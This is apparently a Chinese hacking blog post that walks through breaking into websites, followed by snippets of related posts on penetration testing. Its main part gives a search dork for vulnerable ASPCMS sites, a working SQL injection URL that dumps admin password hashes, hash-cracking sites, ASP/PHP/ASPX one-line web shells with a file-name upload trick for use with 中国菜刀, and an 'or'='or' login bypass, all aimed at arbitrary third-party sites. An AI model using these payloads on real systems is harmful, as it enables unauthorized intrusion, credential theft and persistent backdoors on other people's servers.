渗透(龙帝)

一、Powered by aspcms.com Copyright ?2010-2011

步奏1.

首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011

步奏2.

可以看到有许多站 随便进去一个

接着利用注入漏洞

/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

把这段文字添加到域名后面 比如 www.kastas.cn 就把这段文字添加到这个cn后面

显示:

发表于:2014-4-26 8:26:00 评论者:admin IP:
ea42f1bc4322ef9d
首页上一页1下一页末页

ea42f1bc4322ef9d 这个就是网站密码 我们去解这个密码 http://pmd5.com/?action=getpwd

明文:ella98744

步奏3.

去登陆后台

********************************************************************************

原理1.

Powered by aspcms.com Copyright ?2010-2011   注入原理

(wait)

原理2.

MD5破解网站

http://md5.syue.com/OtherSite-md5.Asp

二、织梦内容管理系统 V57_GBK_SP1

方法:织梦通杀工具

三、中国菜刀

步奏1.

<%eval request("520")%> 这个一句话木马 放在记事本里 然后另存为

然后保存类型 选择为所有文件 文件名 为l.asp;.jpg 也就是桌面上那个

好了 把这个上传

步奏2.

用菜刀连接了

原理

菜刀

参考 http://huaidan.org/archives/3472.html

Asp环境:<%eval request("a")%>

Php环境:<?php @eval($_POST[‘a‘]);?>

Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

四、inurl:download_ok.asp?

步奏1.

关键字:inurl:download_ok.asp?

步奏2.后台

/admin

账户名和密码 输入 ‘or‘=‘or‘

时间: 2024-10-11 06:43:45

渗透(龙帝)的相关文章

了解网站渗透

在百度找到这样一片文章:讲的是渗透的过程,虽然还是有很多不懂,觉得写的不错,留下来慢慢研究: 首先把,主站入手 注册一个账号,看下上传点,等等之类的. 用google找下注入点,格式是 Site:XXX.com inurl:asp|php|aspx|jsp 最好不要带 www,因为不带的话可以检测二级域名. 扫目录,看编辑器和Fckeditor,看下敏感目录,有没有目录遍及, 查下是iis6,iis5.iis7,这些都有不同的利用方法 Iis6解析漏洞 Iis5远程溢出, Iis7畸形解析 Ph

手把手教你如何搭建自己的渗透测试环境

介绍 白帽子是指个体发起的黑客攻击,找到系统潜在的可能被恶意黑客利用的的漏洞或脆弱点.在目标不知情或者没得到授权的情况下发起黑客攻击是非法的.所以通常是建立一个自己的实验室,练习黑客技术. 在这个实验室里,你能看到如何创建一个自己的黑客环境,练习各种各样的黑客攻击技术.我们将会探讨不同类型的虚拟系统,构建一个虚拟网络,在虚拟环境中运行试用版的操作系统,搭建一个有漏洞的web应用程序,安装Kali LInux,执行渗透测试. 所需条件: VMware Workstation Windows XP系

Kali linux渗透测试常用工具汇总2-渗透攻击

渗透攻击的思路一般是扫描漏洞,然后利用不同的漏洞,才有针对的渗透攻击. 漏洞扫描的工具有Nessus,该工具可同时在本地或远端遥控,对系统的漏洞分析扫描.Nessus通过新建扫描策略,并添加对应的插件,便可以对系统漏洞进行扫描. 另一个漏洞扫描工具是OpenVAS,在这里不做说明. 上面说明漏洞扫描,下面说下渗透攻击常用的工具Hydra和Medusa. 举个破解路由器登录密码的例子. [email protected]:~# hydra -l admin -P /tmp/tt.txt -f -V

渗透测试之情报收集

情报收集可以说是白帽子在渗透测试中比较重要也是比较拼耐心的一步,它分为: 一.被动信息收集(不跟目标直接交互,而是通过其他手段来获取目标的相关信息):1.whois查询: 利用whois查询可以获得该目标相关的注册信息和DNS服务器信息(虽然可能是虚假的) 2.netcraft网页工具(网址 http://searchdns.netcraft.com): 通过netcraft可以获取目标的IP地址以及更多详细的信息 3.nslookup: 通过nslookup可以得到目标相关的DNS结构信息(包

Kali Linux 渗透测试之拒绝服务攻击及防御

作为渗透测试人员,有时候需要对客户的系统进行DDOS攻击测试,那么这个时候就需要我们有一款合格的测试工具.而在Kali Linux上就集成了一些DDOS测试工具供测试者使用,下面就简单介绍一些测试工具. kali下的拒绝服务攻击: D(D)OS........................................1 yersinia......................................2 hping3................................

cracer第八期渗透培训教程(价值1500)

下载地址:http://www.zygx8.com/thread-5919-1-1.html 关于培训:  对于培训我想说的是绝对是让你花最少的钱学到东西,其他一些培训机构的教程资料什么的我都看过,讲的还不错,但是学费明显要高于所教的东西的价值.你可能花一万多去一家实地培训机构去学习,而学到的却是只是理论和一些原理的东西,实战的东西很少很少,到头来可能学了 HTML.mysql.sqlserver.php.asp等等,最后你发现一个月过去了,奔着来学习安全的想法,到走了学到的却是开发方面的知识,

网站渗透测试原理及详细过程

网站渗透测试原理及详细过程 渗透测试(Penetration Testing)目录 零.前言一.简介二.制定实施方案三.具体操作过程四.生成报告五.测试过程中的风险及规避参考资料FAQ集 零.前言 渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为. 这里我们提供的所有渗透测试方法均为(假设为)合法的评估服务,也就是通常所说的道德黑客行为(Ethical hacking),因此我们这里的所有读者应当都是Ethical Hackers,如果您还不是,那么我希望您到过这里后会成为他们中的

《Web渗透测试使用kali linux》pdf

下载地址:网盘下载 内容简介 <Web渗透测试:使用Kali Linux>是一本Web渗透测试实践指南,全面讲解如何使用Kali Linux对Web应用进行渗透测试.两位安全领域的专家站在攻击者的角度,一步步介绍了渗透测试基本概念.Kali Linux配置方式,带大家了解如何收集信息并发现攻击目标,然后利用各种漏洞发起攻击,并在此基础之上学会渗透测试,掌握补救易受攻击系统的具体技术.此外,书中还给出了撰写报告的最佳实践,其中一些范例可作为撰写可执行报告的模板. <Web渗透测试:使用Ka

内网渗透+基础+工具使用=自己理解

目录 1.代理 2.内网命令 3.抓密码 4.ipc$共享目录利用 5.端口漏洞 6.溢出 1.代理 端口转发工具有很多比如:rebind2  eDuh  ssock  reDuh  lcx  socks5 等--.. 下面介绍我比较喜欢的2款工具LCX+ socks5 1.lcx 路由器加端口 TCP协议 ,固定IP地址本机 大马设置 Local Ip : 转发ip Local Port : 转发端口 Remote Ip :本机ip (ip138.com外网ip) Remote Port :